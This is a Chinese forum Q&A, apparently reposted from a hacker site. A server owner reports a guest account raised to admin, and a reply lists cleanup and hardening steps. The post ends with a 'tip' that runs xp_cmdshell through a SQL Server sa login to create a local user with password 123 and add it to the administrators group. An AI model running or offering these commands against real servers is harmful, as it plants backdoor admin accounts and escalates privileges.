问：服务器有被入侵的迹象,请教安全设置方法
　　.最近我的服务器总感觉有不太正常,经常发现有一些程序被打开或者就是一登陆远程就提示一些错误,查看了一下GUEST帐号被设置成ADMIN权限了,还关联了我另外一个帐号.这样应该是被入侵了吧,我已经关闭GUEST帐户,有没有什么好的安全设置办法.
　　guest被提为admin?
　　有点显然吧
　　若服务器在身边，可以先断网，做一次彻底的清查
　　第一步：看帐号
　　最好看看是不是有隐藏账号
　　不认识的账号，不知道密码的账号，统统kill掉
　　第二步：察看进程和服务
　　有可疑进程，先不要关（由于不了解关啦会不会有更大麻烦！）
　　看看ｍｓｃｏｎｆｉｇ里边有没有不认识的进程在开机启动。
　　看看系统服务又没有多余的服务项。
　　最好能用ｒｏｏｔｋｉｔ察看下是否有隐藏注册表或程序项　，利用ｒｏｏｔｋｉｔ技术隐藏的用超级巡警也可以查出来　。
　　这一步只是了解情况
　　接着第三步，看网络连接情况
　　因为网络连接是服务器最主要的功能之一，也是入侵者必占有的方向之一。就单独提出来
　　大致了解情况后就动手把
　　该关的关，改删的删
　　＋＋＋＋＋＋＋＋＋＋＋＋＋＋
　　需要注意的是。若你是远程控制的一定要小心些，机子关机或重起你可都看不到阿，再次能不能进入系统也是有点不能保证的。赫赫，
　　－－－－－－－－－－－－
　　由于不了解你的情况
　　这下边就说说防护：
　　１：防火墙一定要有。并且配置好适当的规则
　　２：最好能装个不错的杀毒软件，带主动防御的比较好。（要设好信任程序阿）
　　３：设置好权限，比如ｃ盘就不要允许除超级管理员外的任何人删除东西，但可以保留一些账号有修改的权利，有相当于power用户组的权利。赫赫，具体的还要你配置的。
　　其他的及时打补丁升级病毒库，保留日志我就不说啦，呵呵，要不就能发布一片文章拉
　　就这些拉，若有问题欢迎继续交流讨论
　　
　　———————————————————————————
　　一个小技巧，通过sql一个过程调用提升本地权限的 办法
　　如果有sql   server的管理员（sa）帐号,并且可以登录,尝试用下面的方法:
　　--用管理员连接sql,在查询分析器中执行:
　　--添加用户
　　exec   master.dbo.xp_cmdshell   'net   user   clin003  123   /add'
　　--设置为administrators组
　　exec   master.dbo.xp_cmdshell   'net   localgroup   administrators   cli003   /add'
　　这样你就在服务器上创建了一个名为clin003,密码为123的管理员用户,用他登录系统改你原来管理员的密码就可以了

本篇文章来源于 黑客基地-全球最大的中文黑客站 原文链接：http://www.hackbase.com/tech/2008-12-15/42703.html